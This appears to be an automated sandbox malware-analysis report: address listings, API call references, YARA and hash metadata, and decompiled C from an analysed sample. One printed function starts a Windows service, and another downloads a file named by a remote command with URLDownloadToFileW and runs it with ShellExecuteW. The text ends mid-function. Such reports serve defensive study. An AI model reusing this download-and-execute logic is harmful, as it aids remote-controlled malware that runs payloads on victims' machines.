                                            0x00444123
                                            0x00444123
                                            0x00444126
                                            0x0044412c
                                            0x00444132
                                            0x00444134
                                            0x0044413a
                                            0x0044413c
                                            0x0044413c
                                            0x0044413e
                                            0x0044413e
                                            0x00444147
                                            0x0044414e
                                            0x00444154
                                            0x00444157
                                            0x00444158
                                            0x0044415a
                                            0x0044415a
                                            0x0044415e
                                            0x00444160
                                            0x00444162
                                            0x00444168
                                            0x0044416b
                                            0x00000000
                                            0x0044416d
                                            0x0044416d
                                            0x00444174
                                            0x00444174
                                            0x0044416b
                                            0x00444160
                                            0x00444134
                                            0x00444126
                                            0x0044411d
                                            0x00443dba
                                            0x00443dba
                                            0x00443dba
                                            0x00443dbd
                                            0x00443dc1
                                            0x00443dc1
                                            0x00443dc2
                                            0x00443dd4
                                            0x00443de1
                                            0x00443df0
                                            0x00443e1a
                                            0x00443e1f
                                            0x00443e25
                                            0x00443e28
                                            0x00443e2e
                                            0x00443e31
                                            0x00443eca
                                            0x00443ed1
                                            0x00443f4f
                                            0x00443f55
                                            0x00443f5b
                                            0x00443f5e
                                            0x00443f60
                                            0x00443fe9
                                            0x00443f66
                                            0x00443f66
                                            0x00443f6c
                                            0x00443f6c
                                            0x00443f72
                                            0x00443f78
                                            0x00443f7a
                                            0x00443f7c
                                            0x00443f7c
                                            0x00443f82
                                            0x00443f88
                                            0x00443f8a
                                            0x00443f92
                                            0x00443f92
                                            0x00443f98
                                            0x00443f9a
                                            0x00443f9c
                                            0x00443fa2
                                            0x00443fa4
                                            0x004440bb
                                            0x004440bd
                                            0x004440c3
                                            0x004440c3
                                            0x004440c6
                                            0x004440c7
                                            0x00000000
                                            0x00443faa
                                            0x00443fb0
                                            0x00443fb0
                                            0x00443fb2
                                            0x00443fb8
                                            0x00443fbb
                                            0x00443fc2
                                            0x00443fc8
                                            0x00443fca
                                            0x00443ff1
                                            0x00443ff3
                                            0x00443ff5
                                            0x00443ff7
                                            0x00443ffd
                                            0x00444003
                                            0x0044409d
                                            0x0044409d
                                            0x004440a0
                                            0x00000000
                                            0x004440a6
                                            0x004440a6
                                            0x004440ac
                                            0x00000000
                                            0x004440ac
                                            0x00444009
                                            0x00444009
                                            0x00444009
                                            0x0044400c
                                            0x00000000
                                            0x00000000
                                            0x0044400e
                                            0x00444010
                                            0x00444012
                                            0x0044401b
                                            0x0044401b
                                            0x0044401d
                                            0x00444023
                                            0x00444023
                                            0x0044402f
                                            0x0044403a
                                            0x0044403d
                                            0x0044404a
                                            0x0044404d
                                            0x0044404e
                                            0x0044404f
                                            0x00444055
                                            0x00444057
                                            0x0044405d
                                            0x00444063
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00444065
                                            0x00444065
                                            0x00444065
                                            0x00444067
                                            0x00000000
                                            0x00000000
                                            0x00444069
                                            0x0044406c
                                            0x00000000
                                            0x00444072
                                            0x00444072
                                            0x00444074
                                            0x00444076
                                            0x00444076
                                            0x00444076
                                            0x0044407e
                                            0x00444081
                                            0x00444081
                                            0x00444087
                                            0x00444089
                                            0x0044408b
                                            0x00444092
                                            0x00444098
                                            0x0044409a
                                            0x00000000
                                            0x0044409a
                                            0x00000000
                                            0x0044406c
                                            0x00000000
                                            0x00444065
                                            0x00000000
                                            0x00444009
                                            0x00443fcc
                                            0x00443fcc
                                            0x00443fce
                                            0x00443fd4
                                            0x00443fdb
                                            0x00443fdb
                                            0x00443fde
                                            0x00443fde
                                            0x00000000
                                            0x00443fce
                                            0x00000000
                                            0x004440b2
                                            0x004440b2
                                            0x004440b3
                                            0x004440b3
                                            0x00000000
                                            0x00443fb8
                                            0x00443ed3
                                            0x00443ed3
                                            0x00443ede
                                            0x00443ee5
                                            0x00443eeb
                                            0x00443ef2
                                            0x00443ef3
                                            0x00443ef4
                                            0x00443ef9
                                            0x00443efc
                                            0x00443efe
                                            0x00000000
                                            0x00443f04
                                            0x00443f04
                                            0x00443f07
                                            0x00000000
                                            0x00443f0d
                                            0x00443f0d
                                            0x00443f14
                                            0x00000000
                                            0x00443f1a
                                            0x00443f20
                                            0x00443f22
                                            0x00443f28
                                            0x00443f28
                                            0x00443f2a
                                            0x00443f2a
                                            0x00443f2c
                                            0x00443f35
                                            0x00443f3c
                                            0x00443f3f
                                            0x00443f40
                                            0x00443f42
                                            0x00443f42
                                            0x00000000
                                            0x00443f4a
                                            0x00443f14
                                            0x00443f07
                                            0x00443efe
                                            0x00443e37
                                            0x00443e37
                                            0x00443e3d
                                            0x00443e3f
                                            0x00443e5b
                                            0x00443e5e
                                            0x00000000
                                            0x00443e64
                                            0x00443e64
                                            0x00443e6b
                                            0x00000000
                                            0x00443e71
                                            0x00443e77
                                            0x00443e79
                                            0x00443e7f
                                            0x00443e7f
                                            0x00443e81
                                            0x00443e81
                                            0x00443e83
                                            0x00443e8c
                                            0x00443e93
                                            0x00443e96
                                            0x00443e97
                                            0x00443e99
                                            0x00443e99
                                            0x00443ea1
                                            0x00443ea1
                                            0x00443ea3
                                            0x00000000
                                            0x00443ea9
                                            0x00443ea9
                                            0x00443eaf
                                            0x00443eb2
                                            0x0044417c
                                            0x0044417e
                                            0x0044417f
                                            0x00444185
                                            0x00444191
                                            0x00444198
                                            0x00444199
                                            0x0044419a
                                            0x0044419f
                                            0x004441a2
                                            0x00443eb8
                                            0x00443eb8
                                            0x00443ebf
                                            0x00000000
                                            0x00443ebf
                                            0x00443eb2
                                            0x00443ea3
                                            0x00443e6b
                                            0x00443e41
                                            0x00443e41
                                            0x00443e43
                                            0x00443e49
                                            0x00443e4f
                                            0x00443e50
                                            0x004440cd
                                            0x004440cd
                                            0x004440d4
                                            0x004440d5
                                            0x004440d6
                                            0x004440db
                                            0x004440de
                                            0x004440de
                                            0x004440de
                                            0x00443e3f
                                            0x004440e0
                                            0x004440e0
                                            0x004440e2
                                            0x004441a9
                                            0x004441b0
                                            0x004441b7
                                            0x004441ca
                                            0x004441d0
                                            0x004441d1
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004440e8
                                            0x004440ee
                                            0x004440ee
                                            0x004440f4
                                            0x004440f4
                                            0x00444100
                                            0x00000000
                                            0x00444100
                                            0x0044393d
                                            0x0044393d
                                            0x0044393f
                                            0x00443945
                                            0x00443947
                                            0x0044394d
                                            0x0044394f
                                            0x00443cc6
                                            0x00443cc6
                                            0x00443cc8
                                            0x00443cce
                                            0x00443cd5
                                            0x00443cd7
                                            0x00443d36
                                            0x00443d39
                                            0x00443d3f
                                            0x00443d45
                                            0x00443d4b
                                            0x00443d4d
                                            0x00443d53
                                            0x00443d55
                                            0x00443d55
                                            0x00443d57
                                            0x00443d57
                                            0x00443d59
                                            0x00443d62
                                            0x00443d69
                                            0x00443d6c
                                            0x00443d6d
                                            0x00443d6f
                                            0x00443d6f
                                            0x00443d77
                                            0x00443d79
                                            0x00443d7f
                                            0x00443d85
                                            0x00443d88
                                            0x00000000
                                            0x00443d8e
                                            0x00443d8e
                                            0x00443d95
                                            0x00443d95
                                            0x00443d88
                                            0x00443d79
                                            0x00443d4d
                                            0x00443cd9
                                            0x00443cd9
                                            0x00443cdb
                                            0x00443ce1
                                            0x00443ce7
                                            0x00000000
                                            0x00443ce7
                                            0x00443cd7
                                            0x00443955
                                            0x00443955
                                            0x00443955
                                            0x00443958
                                            0x0044395c
                                            0x0044395c
                                            0x0044395d
                                            0x0044396f
                                            0x0044397c
                                            0x0044398b
                                            0x004439b5
                                            0x004439ba
                                            0x004439c0
                                            0x004439c3
                                            0x004439c9
                                            0x004439cc
                                            0x00443a48
                                            0x00443a4f
                                            0x00443b13
                                            0x00443b19
                                            0x00443b1f
                                            0x00443b22
                                            0x00443b24
                                            0x00443bad
                                            0x00443b2a
                                            0x00443b2a
                                            0x00443b30
                                            0x00443b30
                                            0x00443b36
                                            0x00443b3c
                                            0x00443b3e
                                            0x00443b40
                                            0x00443b40
                                            0x00443b46
                                            0x00443b4c
                                            0x00443b4e
                                            0x00443b56
                                            0x00443b56
                                            0x00443b5c
                                            0x00443b5e
                                            0x00443b60
                                            0x00443b66
                                            0x00443b68
                                            0x00443c7f
                                            0x00443c81
                                            0x00443c87
                                            0x00443c87
                                            0x00000000
                                            0x00443b6e
                                            0x00443b74
                                            0x00443b74
                                            0x00443b76
                                            0x00443b7c
                                            0x00443b7f
                                            0x00443b86
                                            0x00443b8c
                                            0x00443b8e
                                            0x00443bb5
                                            0x00443bb7
                                            0x00443bb9
                                            0x00443bbb
                                            0x00443bc1
                                            0x00443bc7
                                            0x00443c61
                                            0x00443c61
                                            0x00443c64
                                            0x00000000
                                            0x00443c6a
                                            0x00443c6a
                                            0x00443c70
                                            0x00000000
                                            0x00443c70
                                            0x00443bcd
                                            0x00443bcd
                                            0x00443bcd
                                            0x00443bd0
                                            0x00000000
                                            0x00000000
                                            0x00443bd2
                                            0x00443bd4
                                            0x00443bd6
                                            0x00443bdf
                                            0x00443bdf
                                            0x00443be1
                                            0x00443be7
                                            0x00443be7
                                            0x00443bf3
                                            0x00443bfe
                                            0x00443c01
                                            0x00443c0e
                                            0x00443c11
                                            0x00443c12
                                            0x00443c13
                                            0x00443c19
                                            0x00443c1b
                                            0x00443c21
                                            0x00443c27
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00443c29
                                            0x00443c29
                                            0x00443c29
                                            0x00443c2b
                                            0x00000000
                                            0x00000000
                                            0x00443c2d
                                            0x00443c30
                                            0x00443cea
                                            0x00443cea
                                            0x00443cec
                                            0x00443cf2
                                            0x00443cf8
                                            0x00443cf9
                                            0x00000000
                                            0x00443c36
                                            0x00443c36
                                            0x00443c38
                                            0x00443c3a
                                            0x00443c3a
                                            0x00443c3a
                                            0x00443c42
                                            0x00443c45
                                            0x00443c45
                                            0x00443c4b
                                            0x00443c4d
                                            0x00443c4f
                                            0x00443c56
                                            0x00443c5c
                                            0x00443c5e
                                            0x00000000
                                            0x00443c5e
                                            0x00000000
                                            0x00443c30
                                            0x00000000
                                            0x00443c29
                                            0x00000000
                                            0x00443bcd
                                            0x00443b90
                                            0x00443b90
                                            0x00443b92
                                            0x00443b98
                                            0x00443b9f
                                            0x00443b9f
                                            0x00443ba2
                                            0x00443ba2
                                            0x00000000
                                            0x00443b92
                                            0x00000000
                                            0x00443c76
                                            0x00443c76
                                            0x00443c77
                                            0x00443c77
                                            0x00000000
                                            0x00443b7c
                                            0x00443a55
                                            0x00443a55
                                            0x00443a60
                                            0x00443a67
                                            0x00443a6d
                                            0x00443a74
                                            0x00443a75
                                            0x00443a76
                                            0x00443a7b
                                            0x00443a7e
                                            0x00443a80
                                            0x00443a9c
                                            0x00443a9f
                                            0x00000000
                                            0x00443aa5
                                            0x00443aa5
                                            0x00443aac
                                            0x00000000
                                            0x00443ab2
                                            0x00443ab8
                                            0x00443aba
                                            0x00443ac0
                                            0x00443ac0
                                            0x00443ac2
                                            0x00443ac2
                                            0x00443ac4
                                            0x00443acd
                                            0x00443ad4
                                            0x00443ad7
                                            0x00443ad8
                                            0x00443ada
                                            0x00443ada
                                            0x00000000
                                            0x00443ac2
                                            0x00443aac
                                            0x00443a82
                                            0x00443a84
                                            0x00443a8a
                                            0x00443a90
                                            0x00443a91
                                            0x00000000
                                            0x00443a91
                                            0x00443a80
                                            0x004439ce
                                            0x004439ce
                                            0x004439d4
                                            0x004439d6
                                            0x004439eb
                                            0x004439ee
                                            0x00000000
                                            0x004439f4
                                            0x004439f4
                                            0x004439fb
                                            0x00000000
                                            0x00443a01
                                            0x00443a07
                                            0x00443a09
                                            0x00443a0f
                                            0x00443a0f
                                            0x00443a11
                                            0x00443a11
                                            0x00443a13
                                            0x00443a1c
                                            0x00443a23
                                            0x00443a26
                                            0x00443a27
                                            0x00443a29
                                            0x00443a29
                                            0x00443ae2
                                            0x00443ae2
                                            0x00443ae4
                                            0x00000000
                                            0x00443aea
                                            0x00443aea
                                            0x00443af0
                                            0x00443af3
                                            0x00443a36
                                            0x00443a3d
                                            0x00000000
                                            0x00443af9
                                            0x00443afb
                                            0x00443b01
                                            0x00443b07
                                            0x00443b08
                                            0x00443cff
                                            0x00443cff
                                            0x00443d06
                                            0x00443d07
                                            0x00443d08
                                            0x00443d0d
                                            0x00443d10
                                            0x00443d10
                                            0x00443af3
                                            0x00443ae4
                                            0x004439fb
                                            0x004439d8
                                            0x004439d8
                                            0x004439da
                                            0x004439e0
                                            0x00443c8a
                                            0x00443c8a
                                            0x00443c8b
                                            0x00443c91
                                            0x00443c91
                                            0x00443c98
                                            0x00443c99
                                            0x00443c9a
                                            0x00443c9f
                                            0x00443ca2
                                            0x00443ca2
                                            0x00443ca2
                                            0x004439d6
                                            0x00443ca4
                                            0x00443ca4
                                            0x00443ca6
                                            0x00443d14
                                            0x00443d1b
                                            0x00443d1b
                                            0x00443d1b
                                            0x00443d22
                                            0x00443d24
                                            0x00443d2a
                                            0x00443d2b
                                            0x004441d7
                                            0x004441d7
                                            0x004441d8
                                            0x004441d9
                                            0x004441de
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00443ca8
                                            0x00443cae
                                            0x00443cae
                                            0x00443cb4
                                            0x00443cb4
                                            0x00443cc0
                                            0x00000000
                                            0x00443cc0
                                            0x0044394f
                                            0x004441e1
                                            0x004441e1
                                            0x004441e7
                                            0x004441e9
                                            0x004441ef
                                            0x004441f5
                                            0x004441f7
                                            0x004441f9
                                            0x004441fb
                                            0x004441fb
                                            0x004441fd
                                            0x004441fd
                                            0x00444206
                                            0x00444207
                                            0x0044420b
                                            0x00444212
                                            0x00444215
                                            0x00444216
                                            0x00444218
                                            0x00444218
                                            0x0044421c
                                            0x00444222
                                            0x00444224
                                            0x0044422a
                                            0x0044422c
                                            0x00444232
                                            0x00444235
                                            0x00444248
                                            0x0044424a
                                            0x0044424b
                                            0x00444251
                                            0x0044425d
                                            0x00444264
                                            0x00444265
                                            0x00444266
                                            0x0044426b
                                            0x00444237
                                            0x00444239
                                            0x00444240
                                            0x00444240
                                            0x00444235
                                            0x0044426e
                                            0x0044426e
                                            0x0044427e
                                            0x00444287
                                            0x00444288
                                            0x0044428a
                                            0x00444321
                                            0x00444323
                                            0x0044432e
                                            0x0044432e
                                            0x00444330
                                            0x00444333
                                            0x00444335
                                            0x00000000
                                            0x00444325
                                            0x0044432b
                                            0x0044432b
                                            0x00444290
                                            0x00444290
                                            0x00444296
                                            0x00444299
                                            0x0044429f
                                            0x004442a2
                                            0x004442a8
                                            0x004442aa
                                            0x004442b0
                                            0x004442b2
                                            0x004442b4
                                            0x004442b4
                                            0x004442b6
                                            0x004442b6
                                            0x004442c3
                                            0x004442ca
                                            0x004442cd
                                            0x004442ce
                                            0x004442d0
                                            0x004442d1
                                            0x004442d1
                                            0x004442d5
                                            0x004442db
                                            0x004442dd
                                            0x004442df
                                            0x004442e5
                                            0x004442e8
                                            0x004442fb
                                            0x004442fc
                                            0x00444302
                                            0x0044430e
                                            0x00444315
                                            0x00444316
                                            0x00444317
                                            0x0044431c
                                            0x004442ea
                                            0x004442ea
                                            0x004442f1
                                            0x004442f1
                                            0x004442e8
                                            0x004442dd
                                            0x0044433b
                                            0x0044433b
                                            0x0044433b
                                            0x00444347
                                            0x0044434a
                                            0x00444350
                                            0x00444352
                                            0x00444354
                                            0x0044435a
                                            0x0044435c
                                            0x0044435c
                                            0x0044435c
                                            0x0044435a
                                            0x00444361
                                            0x00444362
                                            0x00444364
                                            0x00444366
                                            0x00444366
                                            0x00444368
                                            0x0044436e
                                            0x00444374
                                            0x00444376
                                            0x0044437c
                                            0x0044437c
                                            0x00444382
                                            0x00444384
                                            0x00000000
                                            0x00000000
                                            0x0044438a
                                            0x0044438c
                                            0x0044438e
                                            0x0044438e
                                            0x00444390
                                            0x00444390
                                            0x004443a0
                                            0x004443a7
                                            0x004443aa
                                            0x004443ab
                                            0x004443ad
                                            0x004443ad
                                            0x004443b1
                                            0x004443b7
                                            0x004443b9
                                            0x004443bb
                                            0x004443c1
                                            0x004443c4
                                            0x004443d5
                                            0x004443d7
                                            0x004443d8
                                            0x004443de
                                            0x004443ea
                                            0x004443f1
                                            0x004443f2
                                            0x004443f3
                                            0x004443f8
                                            0x004443c6
                                            0x004443c6
                                            0x004443cd
                                            0x004443cd
                                            0x004443c4
                                            0x00444409
                                            0x00444418
                                            0x00444419
                                            0x00444419
                                            0x0044441b
                                            0x0044441d
                                            0x0044441d
                                            0x00444423
                                            0x00444426
                                            0x00444428
                                            0x0044442a
                                            0x0044442a
                                            0x0044442d
                                            0x0044442e
                                            0x0044442e
                                            0x00444433
                                            0x00444436
                                            0x0044443a
                                            0x0044443a
                                            0x0044443b
                                            0x0044443d
                                            0x00444443
                                            0x00444449
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00444449
                                            0x0044437c
                                            0x0044444f
                                            0x0044444f
                                            0x00000000
                                            0x0044444f
                                            0x004431d4
                                            0x004431cb
                                            0x004431c2
                                            0x00443179
                                            0x0044317d
                                            0x00443185
                                            0x00000000
                                            0x00443187
                                            0x0044318d
                                            0x00443192
                                            0x0044446e
                                            0x0044446e
                                            0x00444471
                                            0x0044447c
                                            0x004444a7
                                            0x004444a8
                                            0x004444a9
                                            0x004444aa
                                            0x004444ab
                                            0x004444ac
                                            0x004444b1
                                            0x004444b4
                                            0x004444b7
                                            0x004444b8
                                            0x004444bb
                                            0x004444bd
                                            0x004444c3
                                            0x004444c6
                                            0x004444c8
                                            0x004444dd
                                            0x004444de
                                            0x004444e1
                                            0x004444e3
                                            0x004444f9
                                            0x004444ff
                                            0x00444507
                                            0x00444509
                                            0x00444514
                                            0x00444517
                                            0x0044452e
                                            0x00444519
                                            0x00444519
                                            0x0044451e
                                            0x00000000
                                            0x0044451e
                                            0x0044450b
                                            0x0044450b
                                            0x00444510
                                            0x00444520
                                            0x00444520
                                            0x00444521
                                            0x00444523
                                            0x00444528
                                            0x00444528
                                            0x004444e5
                                            0x004444e5
                                            0x004444e8
                                            0x00000000
                                            0x004444ea
                                            0x004444ed
                                            0x004444f5
                                            0x004444f5
                                            0x004444e8
                                            0x004444ca
                                            0x004444ca
                                            0x004444d1
                                            0x004444d2
                                            0x004444d4
                                            0x004444d9
                                            0x004444d9
                                            0x004444bf
                                            0x004444bf
                                            0x004444bf
                                            0x00444532
                                            0x0044447e
                                            0x0044447e
                                            0x0044447e
                                            0x00444488
                                            0x00444491
                                            0x00444496
                                            0x004444a4
                                            0x004444a4
                                            0x0044447c
                                            0x00443185

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: __floor_pentium4
                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                            • API String ID: 4168288129-2761157908
                                            • Opcode ID: 8eff31cd372b93f8a1939699f02a2004d78ccc0993723ca6ff86d93bed9573ac
                                            • Instruction ID: 87f37c8af7d25ea3ce8125510e9f0fbb79d0e4060e0dff77118c07ac53e95938
                                            • Opcode Fuzzy Hash: 8eff31cd372b93f8a1939699f02a2004d78ccc0993723ca6ff86d93bed9573ac
                                            • Instruction Fuzzy Hash: F8C25B71E086288FEB25CE28DD447EAB3B5EB84705F1541EBD84DE7240E778AE818F45
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041031F, Relevance: 9.0, APIs: 6, Instructions: 42serviceCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0041031F(char _a4) {
				signed int _t14;
				void* _t17;
				void* _t18;

				_t14 = 0;
				_t18 = OpenSCManagerW(0, 0, 0x10);
				_t17 = OpenServiceW(_t18, L00404090( &_a4), 0x10);
				if(_t17 != 0) {
					_t14 = 0 | StartServiceW(_t17, 0, 0) != 0x00000000;
					CloseServiceHandle(_t18);
					CloseServiceHandle(_t17);
				} else {
					CloseServiceHandle(_t18);
				}
				E004031D1();
				return _t14;
			}






                                            0x00410327
                                            0x00410336
                                            0x00410345
                                            0x00410349
                                            0x00410366
                                            0x00410369
                                            0x0041036c
                                            0x0041034b
                                            0x0041034c
                                            0x0041034c
                                            0x00410371
                                            0x0041037c

                                            APIs
                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,?,0040FFAA,00000000), ref: 0041032B
                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0040FFAA,00000000), ref: 0041033F
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0040FFAA,00000000), ref: 0041034C
                                            • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0040FFAA,00000000), ref: 00410357
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0040FFAA,00000000), ref: 00410369
                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0040FFAA,00000000), ref: 0041036C
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Service$CloseHandle$Open$ManagerStart
                                            • String ID:
                                            • API String ID: 276877138-0
                                            • Opcode ID: 8440f9e757dcae1dc288e8a533bfa630311dbba6093801ea2d9dbcb9f3f21f73
                                            • Instruction ID: bae167bd6cc8d7589460d71c10f553441e51e053e7bb2a5bb0594517b6a5d11e
                                            • Opcode Fuzzy Hash: 8440f9e757dcae1dc288e8a533bfa630311dbba6093801ea2d9dbcb9f3f21f73
                                            • Instruction Fuzzy Hash: AAF0B47550022C7FE6106B31AC89EFF3B2CDB863A5B000036F90592150CE78DD86A5B8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00403E7D, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 161filenetworkCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 80%
                                            			E00403E7D(void* __ebx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
				char _v28;
				char _v44;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v84;
				void* _v104;
				void* __ebp;
				intOrPtr* _t25;
				intOrPtr* _t39;
				void* _t41;
				char _t45;
				void* _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				void* _t60;
				void* _t61;
				void* _t63;
				void* _t84;
				void* _t107;
				void* _t111;
				signed int _t117;
				void* _t120;
				void* _t121;
				void* _t122;
				void* _t126;
				void* _t127;

				_t127 = __eflags;
				_t102 = __edx;
				_t64 = __ebx;
				_t25 = E00401F2E( &_a8);
				E00401F0C( &_a8,  &_v28, 4, 0xffffffff);
				_t120 = (_t117 & 0xfffffff8) - 0x28;
				E004020E6(__ebx, _t120, __edx, _t127, 0x46103c);
				_t121 = _t120 - 0x18;
				E004020E6(__ebx, _t121, __edx, _t127,  &_v44);
				E00411260( &_v84, _t102);
				_t122 = _t121 + 0x30;
				_t111 =  *_t25 - 4;
				if(_t111 == 0) {
					_t107 = 0;
					E004031A1( &_v64, _t102, __eflags, 0);
					_t103 = "F";
					__eflags = E00403C62("F");
					if(__eflags == 0) {
						L14:
						E004031CC( &_v64);
						E00401F97();
						E00401F97();
						return 0;
					}
					_t39 = E00401F2E(E004031A1( &_v64, "F", __eflags, 2));
					_t41 = E00401F2E(E004031A1( &_v68, _t103, __eflags, 3));
					_t104 =  *_t39;
					E00411BB3( &_v60,  *_t39, _t41);
					_t45 = E00401F2E(E004031A1( &_v72,  *_t39, __eflags, 4));
					__imp__URLDownloadToFileW(0, _t45, L00404090( &_v60), 0, 0);
					__eflags = _t45;
					if(__eflags != 0) {
						L4:
						_t84 = _t122 - 0x18;
						_push("2");
						goto L13;
					} else {
						L5:
						__eflags =  *((char*)(E00401F2E(E004031A1( &_v84, _t104, __eflags, 1))));
						if(__eflags == 0) {
							_t84 = _t122 - 0x18;
							_push("0");
						} else {
							_t52 = ShellExecuteW(_t107, L"open", L00404090( &_v72), _t107, _t107, 1);
							_t84 = _t122 - 0x18;
							__eflags = _t52 - 0x20;
							if(__eflags > 0) {
								_push("1");
							} else {
								_push("3");
							}
						}
						L13:
						E0040207E(_t64, _t84);
						_push(0xb3);
						E00401790(_t64, _a4, _t104, _t131);
						E004031D1();
						goto L14;
					}
				}
				_t129 = _t111 != 1;
				if(_t111 != 1) {
					goto L14;
				}
				_t107 = 0;
				E004031A1( &_v64, _t102, _t129, 0);
				_t105 = "F";
				_t54 = E00403C62("F");
				_t130 = _t54;
				if(_t54 == 0) {
					goto L14;
				}
				_t56 = E00401F2E(E004031A1( &_v64, "F", _t130, 2));
				_t58 = E00401F2E(E004031A1( &_v68, _t105, _t130, 3));
				_t104 =  *_t56;
				E00411BB3( &_v60,  *_t56, _t58);
				_t60 = L00404090( &_v60);
				_t61 = E004031A1( &_v72,  *_t56, _t130, 4);
				_t126 = _t122 - 0x18;
				E004020E6(_t64, _t126, _t104, _t130, _t61);
				_t63 = E0041172B(_t60);
				_t122 = _t126 + 0x18;
				_t131 = _t63 - 1;
				if(_t63 == 1) {
					goto L5;
				}
				goto L4;
			}
































                                            0x00403e7d
                                            0x00403e7d
                                            0x00403e7d
                                            0x00403e8b
                                            0x00403e9e
                                            0x00403ea3
                                            0x00403ead
                                            0x00403eb2
                                            0x00403ebc
                                            0x00403ec5
                                            0x00403eca
                                            0x00403ecd
                                            0x00403ed0
                                            0x00403fc3
                                            0x00403fca
                                            0x00403fcf
                                            0x00403fdb
                                            0x00403fdd
                                            0x0040406e
                                            0x00404072
                                            0x0040407b
                                            0x00404083
                                            0x0040408f
                                            0x0040408f
                                            0x00403ff0
                                            0x00404004
                                            0x00404009
                                            0x00404010
                                            0x0040402f
                                            0x00404036
                                            0x0040403c
                                            0x0040403e
                                            0x00403f61
                                            0x00403f64
                                            0x00403f66
                                            0x00000000
                                            0x00404044
                                            0x00403f70
                                            0x00403f82
                                            0x00403f85
                                            0x0040404c
                                            0x0040404e
                                            0x00403f8b
                                            0x00403f9f
                                            0x00403fa8
                                            0x00403faa
                                            0x00403fad
                                            0x00403fb9
                                            0x00403faf
                                            0x00403faf
                                            0x00403faf
                                            0x00403fad
                                            0x00404053
                                            0x00404053
                                            0x0040405b
                                            0x00404060
                                            0x00404069
                                            0x00000000
                                            0x00404069
                                            0x0040403e
                                            0x00403ed6
                                            0x00403ed9
                                            0x00000000
                                            0x00000000
                                            0x00403edf
                                            0x00403ee6
                                            0x00403eeb
                                            0x00403ef2
                                            0x00403ef7
                                            0x00403ef9
                                            0x00000000
                                            0x00000000
                                            0x00403f0c
                                            0x00403f20
                                            0x00403f25
                                            0x00403f2c
                                            0x00403f36
                                            0x00403f43
                                            0x00403f48
                                            0x00403f4e
                                            0x00403f55
                                            0x00403f5a
                                            0x00403f5d
                                            0x00403f5f
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            APIs
                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00403F9F
                                            • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00404036
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: DownloadExecuteFileShell
                                            • String ID: open$TE$TE
                                            • API String ID: 2825088817-1763418746
                                            • Opcode ID: 0e536cd7d17012b05a53f2f36b878b4b4e76c75559ed19f925204d13f0fec0b7
                                            • Instruction ID: 7e30709bcf9355a3a18cefa284366da915d7f8a91f6cfc9c5d1d77ef7a10fbdc
                                            • Opcode Fuzzy Hash: 0e536cd7d17012b05a53f2f36b878b4b4e76c75559ed19f925204d13f0fec0b7
                                            • Instruction Fuzzy Hash: 5341D67160430126DA14FB75CD56A7E37699BC1309F40093EFA527B1E2EF7C9A08C28E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0043FEAC, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 94%
                                            			E0043FEAC(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t12 = _a8 + 8; // 0xfde8fe81
					if(GetLocaleInfoW( *_t12, 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
